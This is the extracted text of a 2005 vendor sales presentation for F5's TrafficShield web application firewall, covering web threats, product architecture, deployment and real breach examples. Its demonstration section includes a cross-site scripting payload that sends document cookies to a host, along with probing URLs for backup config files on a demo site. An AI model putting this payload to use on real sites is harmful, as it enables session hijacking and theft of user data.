‹#›
Filling the security gap
 between
 network and application
Praha
November 2005
Ingmar Lüdemann
Security Sales Manager Central & Eastern Europe

This presentation provides a short overview of the F5 FirePass controller.

‹#›
Agenda
1.Overview of making Applications         >available< – >fast< – >secure<
2.What threats do we face? - general status web application security
3.Short Hacking demonstration
4.Easy explanation of Traffic Shield
5.How does Traffic Shield secure your applications?
6.Real Live examples
7.Summary

This presentation provides a short overview of the F5 FirePass controller.

‹#›
Agenda
1.Overview of making Applications         >available< – >fast< – >secure<
2.What threats do we face? - general status web application security
3.Short Hacking demonstration
4.Easy explanation of Traffic Shield
5.How does Traffic Shield secure your applications?
6.Real Live examples
7.Summary

This presentation provides a short overview of the F5 FirePass controller.

‹#›
Agenda
1.Overview of making Applications         >available< – >fast< – >secure<
2.What threats do we face? - general status web application security
3.Short Hacking demonstration
4.Easy explanation of Traffic Shield
5.How does Traffic Shield secure your applications?
6.Real Live examples
7.Summary

This presentation provides a short overview of the F5 FirePass controller.

‹#›
•“My advice is: Buy a Web application-specific firewall today and install it in front of all your
Web servers as soon as you can.”
•(Richard Stiennon, Gartner, 11/03)
•“Application Firewalls are another hot project. Nearly 1/3 (32 percent) of interviewees have
Application Firewall projects planned for next year [2004].”
(TIP Research, 12/03)
•
Application Market Opportunity
•“The Web application security market will be the hottest sector in Internet security. Enterprises
will allocate budget for Web Application Gateway evaluations from IDS and firewall line items
before officially budgeting for Web application gateways in 2004.”
•(Eric Ogren, Yankee Group)
•
•“Hackers have fallen in love with application layer attacks, and with good reason. They are
relatively easy to execute, and the opportunities are virtually unlimited. Web applications are
fertile ground for hackers, and they control the direct connection to the underlying databases.”
(Pete Lindstrom, Spire Security)
Application Security Market (2002, 2007)
Enterprise Spending (US $)
65% CAGR
Sources: Yankee Group, Eric Ogren, in an interview with Network Magazine, June 21, 2003, Spire
Security, Gartner, TIP

‹#›
Enterprise Security’s Gaping Hole
  DATA
“64% of the 10 million security incidents tracked targeted port 80.”
Information Week

‹#›
Requirements For Application Security
Securing user AND transaction access to  applications and data is critical to completely securing
enterprise IT
Partner
Employee
Customer
Invalid
Transaction From
A Valid System
Unauthorized
User From A Valid
Terminal
Network Perimeter
Security
(Firewall, Virus Scan, IDS, etc.)
Corporate Apps
& Data
Corporate IP Network
arrow-bounce arrow-green
User/transaction validity
App & data access auth.

‹#›
A Growing Problem
•Sources: http://www.newsfactor.com/story.xhtml?story_id=34100,
http://www.newsfactor.com/story.xhtml?story_id=33523
20% Increase in Vulnerabilities
(Application Vulnerabilities, SANS)
36% Increase in Attacks
(Successful Hacks and Defacements, Zone-H)

2,500 Web servers are successfully hacked each day out of the 45 million servers in existence.
Note that this includes defacements

‹#›



‹#›
Why do you need a Web Application Firewall (WAF)?
•Previous Focus:  network perimeter
•perimeter security:  legal or illegal Request?
•“application layer left the internal applications, users and processes wide open”
•Previous Client-Server Apps no go online
•General Increase of web vulnerabilities
•Enormous Time Pressure to go productiv
•New Legal Conditions (personal data security, Basel II, sarbanes oxley…)
•

‹#›
Why Are Web Applications Vulnerable?
•Even the most securely written code becomes insecure over time:
•New type of attack not protected by current best practice methodology
•New code written in a hurry due to business pressures
•Code written by third parties; badly documented, poorly tested, third party not available
•Flaws in third party infrastructure elements
•
•
Time

‹#›
Agile Applications
•Improve:
•Business continuity
•Regulatory compliance
•Business integrity
•Information integrity
•Protection from exponentially increasing threat
•
•. . . while at the same time deliver:
•To market faster
•More with less

‹#›
What dangers do we face?


‹#›
How can you secure your applications?
•No single product ?
•Layered approach:
–Web application vulnerability assessment tool
•Simulating Hacker Attacks
•More effective as manual penetration tests
•Check before Application is online
–Code scanner
•Check of source code
•Tool for developer
•=> AppScan (watchfire)
–Web Application Firewall
•Directly in Data flow  to prevent attacks
•Allows Content Inspection
•Positive security model
•Different methods of policy creation
•Great help when using  (negative) Patch Availability

‹#›
Distinction to Web Services products
•Web application security Produkte
–Browser based applications
–
•Web Services Firewall
–Focus auf server – to – server; basierend auf Web Services Standard
–Extensible Markup Language (XML)
–Simple Object Access Protocol (SOAP)
–
ÞTendency of cohalescence
ÞAlready addressed  (road map)

‹#›
Excursion to:
Risk Management
see separate presentation

This presentation provides a short overview of the F5 FirePass controller.

‹#›
Application Security
FirePass®
Internet
Web
Servers
ICAP
AntiVirus
– Virus filtering of file uploads
– Filter email worms and virus
Web application security
– Cross-site scripting
– Buffer overflow
– SQL injection
– Cookie management
Email and File
Access Security

‹#›
Difference to other Security - Solutions
networkfirewallicon networkfirewallicon networkfirewallicon
Port-
basierend
Protokoll-
basierend
Applikations-
basierend
Firewall
Intrusion
Prevention
Application
Security
Gateway
Application Level Attacks
Protocol Level Attacks
DoS, etc.

‹#›
Traditional Security Doesn’t Protect Web Applications
ü
ü
ü
ü
ü
ü
ü
ü
ü
ü
ü
ü
ü
ü
Known Web Worms
Unknown Web Worms
Known Web Vulnerabilities
Unknown Web Vulnerabilities
Illegal Access to Web-server files
Forceful Browsing
File/Directory Enumerations
Brute Force attacks
Buffer Overflow
Cross-Site Scripting
SQL/OS Injection
Cookie Poisoning
Hidden-Field Manipulation
Parameter Tampering
Application
Firewall
X
X
X
X
X
X
X
X
X
Network Firewall
IPS
X
X
X
X
X
X
ü
Limited
Limited
Limited
Limited
Limited
Limited
Partial
X
Limited
Limited
Limited
Limited
Looking at the wrong thing in the wrong place

These are the names of the attacks people generally refer to when they talk about Application
Security.  Note that it’s all just jargon; everyone has the same list and will claim that they can
prevent it all.  The real question is: HOW do they prevent it, and can they really prevent these
things from happening in real life, in the ways that your applications are vulnerable to?
Transition:  Let me give you a specific example…

‹#›
Jeder Nutzer einer Web-anwendung kann Sicherheits- lücken in der Anwendung ausnutzen, um auf
Systeme
hinter der Anwendung
zuzugreifen.
Da diese Attacken für die existierenden Sicherheits-
Systeme wie gültige Browser-Anfragen aussehen, werden
sie nicht erkannt
APP 1
APP 2
DEEP
INSPECTION
FIREWALL
Web Browser
INTRUSION
PREVENTION
SYSTEM
Ohne TrafficShield
Application Security Gateway

Companies are just now beginning to realize that all the information they have made available to
users in a Web browser are open to hackers.
•All existing security products let browser traffic through
•Unlike client-server applications, browser applications let you “view source” and change what
you’re asking for
•…They can’t tell difference between “me asking for my information and me asking for your
information”
Transition:  Let me give you a specific example…

‹#›
Web Applications Increasingly Under Attack
•High information density in the core
•Flaws in applications & 3rd party software
•Traditional security does not protect web apps.
•Gaping hole in perimeter security for web traffic
•Threat growing exponentially
•
•High value attack; AttackValue = Gain / Effort
•
•
“My advice is: Buy a Web application-specific firewall today and install it in front of all your
Web servers as soon as you can.”    Gartner, November 2003
“Application Firewalls are another hot project. Nearly 1/3 (32 percent) of interviewees have
Application Firewall projects planned for next year.” TIP Research, December 2003

‹#›
Agenda
1.Overview of making Applications         >available< – >fast< – >secure<
2.What threats do we face? - general status web application security
3.Short Hacking demonstration
4.Easy explanation of Traffic Shield
5.How does Traffic Shield secure your applications?
6.Real Live examples
7.Summary

This presentation provides a short overview of the F5 FirePass controller.

‹#›



‹#›
http://auction.f5.com/


‹#›
http://auction.f5.com/includes/


‹#›
•


‹#›
http://auction.f5.com/includes/config.inc.php


‹#›



‹#›
http://auction.f5.com/includes/config.inc.php.old


‹#›
•


‹#›



‹#›



‹#›
•


‹#›
•
http://auction.f5.com/user_menu.php?nick=charlie

‹#›
•
http://auction.f5.com/user_menu.php?nick=*

‹#›



‹#›



‹#›
<script language="javascript">
document.write('<img src=http://localhost/?url=' + document.location + '&cookie=' + document.cookie
+ '>');
</script>

‹#›



‹#›



‹#›



‹#›



‹#›



‹#›



‹#›
Your credit card XXXX XXX XXX 35008 will be charged US$1.00


‹#›
Agenda
1.Overview of making Applications         >available< – >fast< – >secure<
2.What threats do we face? - general status web application security
3.Short Hacking demonstration
4.Easy explanation of Traffic Shield
5.How does Traffic Shield secure your applications?
6.Real Live examples
7.
7.Summary

This presentation provides a short overview of the F5 FirePass controller.

‹#›
Step One: The Browser
“Companies are putting more and more information into web browsers.”

‹#›
Step Two: The Connection
“What they don’t realize is that these browers have direct access to customer data – or servers
that access that data.
If you can access your account data, you can access someone else’s.”

‹#›
Step Three: Firewalls are Inadequate
“All of this communication is over Ports 80 and 443 – which are wide open on Network Firewalls.
They can’t tell the difference between me asking for my information and me asking for yours.”

‹#›
Step Four: Introduce TrafficShield
“TrafficShield terminates that web traffic, and makes sure it’s legitimate.”

‹#›
Step Five: How Does it Work?
“TrafficShield can tell if the request is legitimate because when it is installed, it creates a
little map of the application, and checks to see if a given request is part of that map of legal
requests.”

‹#›
Step Five: How Does it Work?
“This map can be as detailed as customers want: including object types, object names, parameters,
and parameter values.”

‹#›
Complete Picture
Servers
(and data)
TrafficShield
Network
Firewall
Browser

‹#›
IF THEY ASK: Is This Different from IPS?
IPS
“IPS (often integrated into Network Firewalls) looks for attack signatures – useful for stopping
known worms or script kiddies, but blind to a targeted attack.”

‹#›
IF THEY ASK: How Does This Complement a Network Firewall?
“It’s only looking at Web traffic, only for those applications. A web application firewall.”

‹#›
Agenda
1.Overview of making Applications         >available< – >fast< – >secure<
2.What threats do we face? - general status web application security
3.Short Hacking demonstration
4.Easy explanation of Traffic Shield
5.How does Traffic Shield secure your applications?
6.Real Live examples
7.Summary

This presentation provides a short overview of the F5 FirePass controller.

‹#›
Web (!) Application
Security
with
TrafficShield

‹#›
Intelligent Infrastructure
VPN
App
Firewall
App
User
Traffic
Mgt
Intelligent Client
Network Plumbing
Application Infrastructure
Application
VALID BEHAVIOUR ONLY
Positive Security
ATTACKS
Negative Security
EXPOSURES
Negative Security:
•Exponential threat
•Exposure Window
•No ‘Zero Day” Protection
Positive Security:
•Growth bound by application size
•Exposure Protection
•‘Zero Day” Protection
Firewall
IDS-IPS
Anti-Virus

Customers have demanded that we increase the types of things that we do to traffic.
What Every Enterprise is asking
How do I make my applications run better without rewriting them, or incurring major infrastructure
cost and adding significant management overhead?
“I need to be as optimized as I can be with minimal resource impacts and as simply as possible.”
-Ken Langston, Director of Infrastructure,

‹#›
Application Security Placement
VPN
App
Firewall
App
User
Traffic
Mgt
Intelligent Client
Network Plumbing
Application Infrastructure
Application
Firewall
IDS-IPS
Anti-Virus

Customers have demanded that we increase the types of things that we do to traffic.
What Every Enterprise is asking
How do I make my applications run better without rewriting them, or incurring major infrastructure
cost and adding significant management overhead?
“I need to be as optimized as I can be with minimal resource impacts and as simply as possible.”
-Ken Langston, Director of Infrastructure,

‹#›
Horizontal brick
Application Security Methodology
•Policy-based proxy
•Appliance form-factor
•Stops generalised & targeted attacks
•Application content & context aware
•Bi-directional; content scrubbing & application cloaking
VPN
App
Firewall
App
User
Traffic
Mgt
Intelligent Client
Network Plumbing
Application Infrastructure
Application
Firewall
IDS-IDP
Anti-Virus
Buffer Overflow
Cross-Site Scripting
SQL/OS Injection
Cookie Poisoning
Hidden-Field Manipulation
Parameter Tampering
Error Messages
Non-compliant Content
Fingerprints

Customers have demanded that we increase the types of things that we do to traffic.
What Every Enterprise is asking
How do I make my applications run better without rewriting them, or incurring major infrastructure
cost and adding significant management overhead?
“I need to be as optimized as I can be with minimal resource impacts and as simply as possible.”
-Ken Langston, Director of Infrastructure,

‹#›
Application Security with TrafficShield
Horizontal brick
Horizontal brick
PORT 80
PORT 443
Attacks Now Look To
Exploit Application
Vulnerabilities
Perimeter Security
Is Strong
Buffer Overflow
Cross-Site Scripting
SQL/OS Injection
Cookie Poisoning
Hidden-Field Manipulation
Parameter Tampering
!
Infrastructural
Intelligence
!
Non-compliant
Information
High
Information
Density
=
High Value
Attack
!
Forced
Access to
Information
But Is Open
to Web Traffic

‹#›
!
Non-compliant
Information
ts
Application Security with TrafficShield
!
Unauthorised
Access
!
Infrastructural
Intelligence
•Bi-directional:
–Inbound: protection from generalised & targeted attacks
–Outbound: content scrubbing & application cloaking
•Application content & context aware
•High performance, low latency, high availability, high security
TrafficShield Allows
Legitimate Requests
And Stops
Bad
Requests
!
Unauthorised
Access

‹#›
ts Horizontal brick
Application Security with TrafficShield
Horizontal brick
Intelligent Decisions
Allow Only Good
Application Behaviour;
Positive Security
Definition of Good
and Bad Behaviour

‹#›
Single Unit Deployment
internet server server server firewall
Firewall
ts
TrafficShield
Web Servers
desktop_pc
Management Access
(browser)
bigip
LB Switch

‹#›
TrafficShield Topology - Standard
internet firewall server ts ts
standby
ts
active
firewall
web server

‹#›
server server server ts
TrafficShield
Web Servers
Active
ts
Backup
Redundant Deployment
firewall
Firewall
internet desktop_pc
Management Access
(browser)
bigip
LB Switch

‹#›
server server server bigip ts ts ts bigip
TrafficShield
Web Servers
LB Switch
LB Switch
Load Balanced Deployment
firewall
Firewall
internet desktop_pc
Management Access
(browser)

‹#›
TrafficShield Deployment
•Installed in-line to existing web servers
•
•Point DNS to TrafficShield service IP address
•
•Have fall-back method to switch traffic to servers in event of failure
ts 2_racks_trans 2_racks_trans 2_racks_trans

‹#›
Transparent Proxy
Browser
Server
TrafficShield
Private Network
Browser
Server
Service-IP
desktop_pc 2_racks_trans 2_racks_trans desktop_pc
Service-IP
ts

•Typically TrafficShield takes WEB server service IP and serves users using this IP.
•TrafficShield communicates with WEB server using private addresses (this makes direct access from
external address to WEB service impossible).
•Application session termination.
•Browser is not aware that TrafficShield exists.

‹#›
Browser
Server
2_racks_trans desktop_pc ts
Enforcement
TrafficShield
Security Policy
Application Cloaking
How TrafficShield Policies Work

•Typically TrafficShield takes WEB server service IP and serves users using this IP.
•TrafficShield communicates with WEB server using private addresses (this makes direct access from
external address to WEB service impossible).
•Application session termination.
•Browser is not aware that TrafficShield exists.

‹#›
TrafficShield
(passive/active)
CRAWLER
‘Maps’ the App.
(APC only)
Live Data
Operator
Implements
policy updates
Security Policy
Building a Security Policy
LEARNING
Recommends
policy updates
based on traffic

‹#›
Positive Security


‹#›
Actions not known to be legal can now be blocked
  - Wrong page order
  - Invalid parameter
  - Invalid value
  - etc.
<script>
Positive Security

‹#›
TrafficShield Layered Protection Mechanisms
Application
Generic
TCP/IP level attacks eg SYN flood
Allowed object types & lengths
Network firewall functionality
Checks for a valid host name
Allowed object & length
Valid HTTP(S) syntax
Valid character sets
Outbound content scrubbing & cloaking
Required parameters
Dynamic parameters
Application flow
How to OPTIMISE; Accuracy, Protection & Cost of Ownership?
Application
Specific

‹#›
Balance of Needs
Business Need
Determines
Security Need
Determines
Granularity
Application Size, Granularity &
Rate of Change
Determines
TCO

‹#›
Shift The Balance
  LO                                             HI
  HI
Security Gain

‹#›
Rapid Deployment & Low Cost of Ownership
75%
Protection
25%
Effort

‹#›
Hybrid Policies for Optimum Protection
High Protection
Absolute Protection
Optimum Protection
Baseline Templates
Low cost of
ownership
Highly Tailored
High cost of
ownership
Hybrid Approach
Reasonable protection
for reasonable costs
75%
25%

‹#›
Flexible Policy Granularity
•Generic Policies - Policy per object type
–Low number of policies
–Quick to implement
–Requires little change management
–Can’t take application flow into account
•Specific Policies – Policy per object
–High number of policies
–More time to implement
–Requires change management policy
–Can enforce application flow
–Tightest possible security
–
Optimum policy is often a hybrid

‹#›
Rapid Deployment & Low Cost of Ownership
Generic
Application
Specific
Object
Specific
Flow
•High protection
•Rapid deployment
•Low cost of ownership
75% of Protection delivered with 25% of the Cost

‹#›
Search for:  ‘command injection’
Flexible Policy Granularity
Single quote is a command delimiter:
•Best practice to disallow from parameters wherever possible
•Easiest to achieve with a generic policy applied to the whole site
User Name:    O’Connor
Single quote needed in some parameters:
•Need to be able to selectively relax policy – eg single quote allowed in this parameter
•Need to limit use within relaxed policy – eg only one single quote allowed in this parameter
BUT . . .

‹#›
Automated Policy Generation & Adaptation
•Application Mapping
–Objects & Values
–Application Flow
–Authentication Flow
•In-line Learning
•User Defined Behaviour
–On violation detection
–On finding new object
–By object, object type, application area
•
•
•

‹#›
Efficiency - Authentication Flow
Username
Password
Password
!
VIOLATION
!
VIOLATION
?

‹#›
Implementation Methodology
Optimum Security

‹#›
HTTP Request
• A request for a PHP script might look like this
•
–http://www.somesite.com/article.php?id=425&format=html
•
• As you can see, the file article.php is run just like an executable, with items to the left of
the question mark treated like additional input or arguments. If you envision article.php as a
Windows executable (call it article.exe) run from a command line, the previous example look like
this:
•
–C:\ article.exe  /id: 425  /format: html
•
•
•
–
•

‹#›
HTTP Request
• http://www.somesite.com/article.php?id=425&format=html
•
– Object
– Object type
– Parameter name
– Parameter value
– Query String (everything which comes after the “?”)

‹#›
n-tier Web Application Layer


‹#›
OBJECT TYPES
OBJECT NAMES
PARAMETER NAMES
PARAMETER VALUES
OBJECT FLOWS
Flexible Deployment Options
Policy-Building Tools
•“Trusted IP” Learning
•Live Traffic Learning
•Crawler
•IIS interface (prototype)
•Negative RegEx
•Template
POLICY
TIGHTENING
SUGGESTIONS
Tighter Security Posture
Typical ‘standard’ starting point

TrafficShield offers flexible deployment options to provide the security posture demanded by your
business requirements.  Our standard implementation can be done in as little as one day, providing
protection from the most common application attacks, and locking down particular objects or
directories which are at risk.
TrafficShield’s “Learning” mechanism leverages a suite of tools to provide suggestions for a
tighter security policy, allowing customers to increase their security posture only when they are
confident that the policy is accurate enough to support it.

‹#›
1.Network Installation
•Install in the site infrastructure
•Run live data in passive
2.Standard Implementation
•Start with a generic policy template
•Refine policy using live data
•Activate enforcement
3.Policy Tightening: APC Phase 1
•Run Crawler on selected parts of the site
•Refine the security policy - adding objects and parameters
4.Policy Tightening: APC Phase 2
•Refine the security policy - adding flow
5.
Implementation Sequence

‹#›
1.Standard Implementation
•Security tightness: Moderate
•Implementation length: Short (~1 day per Web app*)
•On going maintenance: Minimal, on significant app changes only
2.Policy Tightening: APC Phase 1
•Security tightness: Flexible, moderate to high
•Implementation length: Flexible (1 day to 1 week*)
•On going maintenance: Moderate, on moderate app changes
3.Policy Tightening: APC Phase 2
•Security tightness: High to very high
•Implementation length: Long (>1  week* - est.)
•On going maintenance: High, on any app change
Implementation Types – The Tradeoffs

‹#›
Enterprise Hardware Platform
Manageability:
•  LCD for Simplified
   Management
•  Hot-Swappable Power
   and Cooling
•  Redundant Power/Fans
Performance:
• Unique Hardware
  Acceleration Support
• 4x Performance Increase
• Dual Processor
Secure:
•Hardened Appliance
•Secure O/S
•Tested for Vulnerabilities
•Avoids Configuration/ Compatibility Issues
TrafficShield™ 4100
Best in Class Security, Performance and Management

‹#›
Comprehensive Functionality
Filters Attacks
• Targeted
-Buffer Overflow
-Cross-Site Scripting
-SQL/OS Injection
-Cookie Poisoning
-Unvalidated Input Manipulation
-Broken Access Control (Forceful Browsing)
–
• Random
-Script Kiddies
-Known Worms & Vulnerabilities
-Requests for Restricted Object and File Types
- Non-RFC-Compliant Traffic
- Illegal HTTP Format, Method
-
Application Cloaking
•Prevents OS and Web Server Fingerprinting
•
•Blocks HTTP and Application Error Messages
Security Services
•SSL Acceleration
•
•Key Management and Failover Handling
•
•Reverse Proxy
•
•IP/Port Filtering
Scrubs Outgoing Content
•Social Security Numbers
•
•Credit Card Numbers
•
•Account Numbers
•
•Patient Health ePHI
•
•Any Other Identifiable Text Pattern

‹#›
ts Horizontal brick
Application Security with TrafficShield
Horizontal brick
•Protect brand integrity
•Protect corporate & personal information
•Faster applications deployment
•Reduce application development costs
•Reduce application maintenance costs
•Policy-based full proxy with deep inspection & Java support
•Positive security augmenting negative security
•Central point of application security enforcement:
–Allows applications to be deployed faster – lower cost
–Protect applications from attacks reducing maintenance costs

‹#›
Agenda
1.Overview of making Applications         >available< – >fast< – >secure<
2.What threats do we face? - general status web application security
3.Short Hacking demonstration
4.Easy explanation of Traffic Shield
5.How does Traffic Shield secure your applications?
6.Real Live examples
7.Summary

This presentation provides a short overview of the F5 FirePass controller.

‹#›
Common Application Attacks
•Improper validation of input by server side Web application (relying on client side validation):
–Cookie Poisoning
–Hidden Field Manipulation
–Parameter Tampering
–Stealth Commanding (e.g. SQL/OS Injection)
–Cross-site Scripting
–Application Buffer Overflow
•
•Backdoors and Debugs option (left in the application)
•
•Poor Session Management, Access Control & Authentication
•
•Third Party Misconfiguration

‹#›
Cisco Web Site Breached by Hackers
By Nate Mook, BetaNews
August 3, 2005, 12:24 PM
Facing a second embarrassing security situation in as many weeks, Cisco on Wednesday began
notifying customers that its Web site, Cisco.com, had been compromised and asked users to change
their passwords. News of the breach followed a report that Cisco's routers were vulnerable to a
serious exploit.
"It has been brought to our attention that there is an issue in a Cisco.com search tool that could
expose passwords for registered users," the company wrote. "As a result, to protect our registered
Cisco.com users, we're taking the proactive step of resetting Cisco.com passwords."

‹#›
Real-life Example: Cahoot
Customers could access other people's account details by entering only a username into the system
and bypassing other security information.
Cahoot, owned by Abbey National, said that while account information could be viewed, no money
could be moved.
The security breach was exposed when a Cahoot user contacted the BBC. He said he had stumbled upon
a way of getting into his account with just his username.
5 November 2004
Full Story
http://www.thisismoney.com/20041105/nm84337.html
cahoot home page

‹#›
Real-life Example: Gateway Computer
•“The computer maker's site assigned a user number to anyone who opened an account; [saved in a
cookie] If you changed your number before returning to Gateway, the site's computers would think
you were the owner of that second number, and would display in your browser that other person's
name, address, phone number and order history, along with the last four digits, expiration date and
even "verification code" of his or her credit card.”
•(Wall St. Journal, February 2004)
•
•The Hack:
•Cookie Poisoning
•
•Full Story
•http://webreprints.djreprints.com/950910380730.html
Gateway

‹#›
Real-life Example: Minnesota State Police
•“For months, access to a massive database of police files was available to anyone with a
rudimentary knowledge of computers and an Internet link, according to a man who said he looked up
files on the system several times. The man said he accessed the system by simply adding the words
•PersonSearch/PersonSearch.asp
•to the end of the link's normal Web address.
•(Associated Press)
•
•The Hack
•Forceful Browsing
•(aka Broken Access Control)
•
•Full Story
•http://webreprints.djreprints.com/950910380730.html
patrollogowithnames

‹#›
Real-life Example: Oracle Applications
•“Oracle Corporation has announced a security flaw in Oracle Applications 11i that allows an
attacker to carry out database functions through a company's Web site.
•The flaw, discovered by security firm Integrigy Corporation, is known as an SQL Injection
vulnerability. It allows an attacker to manipulate the database by putting SQL code into Web page
input fields.”
•(ZDNet, June 2004)
•
•The Hack
•SQL Injection
•
•Full Story
•http://www.zdnet.com.au/news/security/0,2000061744,39150326,00.htm
Oracle Corporation Home Page

‹#›
Real-life Example: Microsoft ASP.net
•“This alert is to advise you of … a security vulnerability in ASP.NET.  A malicious user could
provide a specially-formed URL that could result in the unintended serving of secured content.”
•(Microsoft memo to VISP partners, October 2004)
•
•The Hack
•Parameter Tampering
•
•Full Story
•http://support.microsoft.com/?kbid=887459
quickstart

‹#›
Real-life Example: Google Hacking
•Search for words in URLs, such as
–‘admin’ or ‘password’ to find restricted pages
•Search for documents behind login pages
–‘finance.xls’ or specific research reports
•Search for known vulnerabilities
–Specific .dll and .pwd files often left open during server configuration
Picture1 Picture2

‹#›
Agenda
1.Overview of making Applications         >available< – >fast< – >secure<
2.What threats do we face? - general status web application security
3.Short Hacking demonstration
4.Easy explanation of Traffic Shield
5.How does Traffic Shield secure your applications?
6.Summary

This presentation provides a short overview of the F5 FirePass controller.

‹#›
Key Advantages of Web Application Firewalls
•Positive security protects from unknown attacks
•Protects outbound content:
–Cloaks architectural & infrastructural information from hacker reconnaissance
–Identifies & scrubs non-compliant content
•Central point of application security enforcement:
–Allows applications to be deployed faster without compromising security – augmenting best practice
methodology
–Rapid deployment of new policies can protect ALL applications from new attacks and common flaws
reducing application maintenance costs

‹#›
Why TrafficShield?
•Positive security model extends defence-in-depth to web applications
–Stop anything but good application behaviour
•
•Flexible deployment
–Selective granularity to achieve optimum security
–Flexible behavioural control to eliminate false positives
–Powerful automation to reduce operating costs
•Enterprise class hardened appliance
–High performance
–High security
–High availability
•F5 common architecture
–Reduced cost of ownership
•F5 financial strength & market leadership
–Investment protection

‹#›
Why F5?
•Global support capabilities
•Depth of financial support to fund growth
•Market share expansion due to AppShield acquisition
•Market share expansion due to Big-IP integration (compare Gartner!)
•Strategic potential with BIG-IP and FirePass on common TM/OS environment
•Frost & sullivan report (award)
The ONLY financially secure vendor with a viable product who is set to lead the market:

‹#›
•$282 M Revenues in FY2005 (Up 64% YOY)
•$350 M in Cash & Investments
•Zero Debt
•Common Scaleable Architecture
•Acquisition Excellence
•Market Leadership
•Technology Leadership
•Agile Application Delivery
–Integration
•End-to-end Optimisation:
–Performance
–Availability
–Security
–Reach
Most common motive for partnership between customer and vendor
Strength
Vision
Execution

‹#›
Questions
&
Answers

Any now get back to work.
(George W. Bush)
Thank you for taking our time.

‹#›
Checkpoint
•No direct competition, primarily Marketing
•stárted 04/2004:  Product: “Web Itelligence”
•ICSA Lab:  Did not participate in Test End of 2004
•Reality: a little more than http protocol inspection (negative security)
•Cannot inspect SSL encrypted https traffic
•Claim of full proxy – not the case
•Not supported:
–Hidden field validation
–Forceful browsing
–Session/cookie poisening
–
•
•

‹#›
Fragen
•Learning mode – was wenn in der Zeit angriff
•Application layer: abgrenzung zu webwasher etc.
•Typische anwendungen: shop, etc
•Warum ist das so kompliziert
•Wie erkennt man illegalen traffic
•Kaufkriterium: URI session ID, wenn diese verändert, könnte session eines anderes users übernehmen
•
•

‹#›
Wettbewerb
• Das mangelnde Bewusstsein
• Keiner !
•
• Die Großen:
• Checkpoint, Symantec, McAffee etc.
–
–
–Die Kleinen:
ØImperva
ØTeros
ØNetcontinuum
ØDeny all (France)
ØSeclution (Schweiz)
ØKavado
ØSanktum/watchfire